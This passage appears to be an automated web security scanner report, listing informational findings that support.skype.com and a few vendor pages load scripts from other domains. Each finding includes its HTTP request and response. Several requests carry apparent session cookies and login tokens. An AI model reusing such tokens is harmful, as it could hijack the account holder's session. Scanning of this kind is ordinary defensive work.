Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:31:10 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 48873


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, user
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.514. https://support.skype.com/en/category/YANDEX_MONEY/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/YANDEX_MONEY/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/category/YANDEX_MONEY/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:31:13 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 46809


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, user
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.515. https://support.skype.com/en/faq/FA10184/How-do-I-create-a-Skype-account  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/faq/FA10184/How-do-I-create-a-Skype-account

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/faq/FA10184/How-do-I-create-a-Skype-account HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: support.skype.com
Connection: Keep-Alive
Cookie: skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; JSESSIONID=C51B9013C862C1913F4926F5DFFB3B93; skypeSessionId=C51B9013C862C1913F4926F5DFFB3B93

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:07:45 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Content-Length: 52423
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype: How do I create a Skype account?</title>
   <meta name="description" content="Help using Skype - FAQs, user guides
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.516. https://support.skype.com/en/faq/FA10673/What-is-Skype-Home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/faq/FA10673/What-is-Skype-Home

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/faq/FA10673/What-is-Skype-Home HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:32:33 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52104


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype: What is Skype Home?</title>
   <meta name="description" content="Help using Skype - FAQs, user guides, troubleshoo
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.517. https://support.skype.com/en/faq/FA109/I-ve-forgotten-my-password  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/faq/FA109/I-ve-forgotten-my-password

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/faq/FA109/I-ve-forgotten-my-password HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:32:11 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 54142


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype: I...ve forgotten my password...</title>
   <meta name="description" content="Help using Skype - FAQs, user guides,
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.518. https://support.skype.com/en/faq/FA1170/How-can-I-contact-Skype-Customer-Service  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/faq/FA1170/How-can-I-contact-Skype-Customer-Service

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/faq/FA1170/How-can-I-contact-Skype-Customer-Service HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:32:19 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51161


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype: How can I contact Skype Customer Service?</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.519. https://support.skype.com/en/faq/FA96/How-do-I-change-my-email-address-or-add-another-email-address-to-my-profile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/faq/FA96/How-do-I-change-my-email-address-or-add-another-email-address-to-my-profile

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/faq/FA96/How-do-I-change-my-email-address-or-add-another-email-address-to-my-profile HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:32:20 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52675


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype: How do I change my email address, or add another email address to my profile?</title>
   <meta name="description"
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.520. https://support.skype.com/en/faqFeedback.form  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/faqFeedback.form

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/faqFeedback.form HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 04 Sep 2011 21:32:44 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 42353


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
</script>
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.521. https://support.skype.com/en/glossary  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/glossary

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/glossary HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:33:12 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 67060


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
</script>
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.522. https://support.skype.com/en/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/search

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/search?q=xss HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://support.skype.com/en/faq/FA10184/How-do-I-create-a-Skype-account
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: support.skype.com
Connection: Keep-Alive
Cookie: skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; JSESSIONID=C51B9013C862C1913F4926F5DFFB3B93; skypeSessionId=C51B9013C862C1913F4926F5DFFB3B93

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:08:16 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Content-Length: 42545
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lan
...[SNIP]...
</script>
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.523. https://support.skype.com/en/search.form  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/search.form

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/search.form HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 04 Sep 2011 21:32:47 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 42348


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
</script>
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.524. https://support.skype.com/en/support_selection_after_search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/support_selection_after_search

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/support_selection_after_search HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 04 Sep 2011 21:32:43 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 42364


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
</script>
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.525. https://support.skype.com/en/tips  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/tips

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/tips HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:32:57 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 44026


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
</script>
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.526. https://support.skype.com/faqView.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /faqView.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /faqView.do HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 04 Sep 2011 21:37:09 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 12380


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.527. https://support.skype.com/homepage.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /homepage.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /homepage.do HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 04 Sep 2011 21:37:07 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 12381


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.528. https://support.skype.com/search.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /search.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search.do HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 04 Sep 2011 21:37:09 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 12379


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.529. http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barracudanetworks.com
Path:   /ns/products/web-site-firewall-overview.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ns/products/web-site-firewall-overview.php?&a=google-na_WebAppFirewallWW_WebApplicationSecurity&kw=web%20application%20security&gclid=CP2344L_g6sCFUsaQgodmjw72Q HTTP/1.1
Host: www.barracudanetworks.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: barra_tracking_code=google-na_WebAppFirewallWW_WebApplicationSecurity; path=/
Set-Cookie: barra_tracking_code_keyword=web+application+security; path=/
Set-Cookie: __debug=TDO; path=/
Set-Cookie: barra_referer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DHoulihan%2BLokey%23sclient%3Dpsy%26hl%3Den%26source%3Dhp%26q%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26pbx%3D1%26oq%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26aq%3Df%26aqi%3Dq-w1%26aql%3D%26gs_sm%3De%26gs_upl%3D21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db7e6040383bebbf%26biw%3D1049%26bih%3D910; path=/
Set-Cookie: barra_hidden_menus=a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3Bi%3A1%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; expires=Tue, 04-Oct-2011 16:18:30 GMT; path=/
Date: Sun, 04 Sep 2011 16:18:29 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
</script>
       <script type="text/javascript" src="http://www.demosondemand.com/shared_components/javascript/launchDemoStage3PlayerClient_js.asp"></script>
...[SNIP]...
<div id="live-chat-loader" style="display: none">
<script type="text/javascript" src="http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx?div=&zimg=59&lhnid=1288&iv=&custom1=&custom2=&custom3=&t=f"></script>
...[SNIP]...

18.530. http://www.cgisecurity.com/lib/XmlHTTPRequest.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cgisecurity.com
Path:   /lib/XmlHTTPRequest.shtml

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /lib/XmlHTTPRequest.shtml HTTP/1.1
Host: www.cgisecurity.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Referrer+data+found+in+displayed+innerHTML#sclient=psy&hl=en&source=hp&q=Referrer+data+displayed+innerHTML&pbx=1&oq=Referrer+data+displayed+innerHTML&aq=f&aqi=&aql=&gs_sm=e&gs_upl=9979l11361l0l11816l9l8l0l0l0l1l906l906l6-1l1l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-PhApp: oak-tp-web035
X-Webserver: oak-tp-web035
Vary: cookie
Expires: Mon, 05 Sep 2011 06:23:12 GMT
Last-Modified: Mon, 19 Jan 2009 05:58:20 GMT
Content-Disposition: inline; filename=XmlHTTPRequest.shtml
Content-Type: text/html; charset=utf-8
Keep-Alive: timeout=300, max=100
Content-Length: 42599
Date: Mon, 05 Sep 2011 02:23:13 GMT
X-Varnish: 3033115944 3033114404
Age: 1
Via: 1.1 varnish

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <link rel="stylesheet" href="/i/styles.css" type="text/css" med
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<ul class="module-list">
<script src="http://www.typepad.com/t/content?src=Feed:http%3A%2F%2Fwebappsec.org/rss/websecurity.rss,10" defer="defer"></script>
...[SNIP]...
<img src="http://images.cgisecurity.com/i/1.gif">
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.531. http://www.cymphonix.com/2011-shaping-demo-sem.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cymphonix.com
Path:   /2011-shaping-demo-sem.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011-shaping-demo-sem.html?utm_campaign=2011-Q1-Web-AdWords&utm_source=AdWords&utm_content=7-Minute-Demo&gclid=CPr6tJD_g6sCFQo0QgodKw5i0g HTTP/1.1
Host: www.cymphonix.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:07 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8g mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 14014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
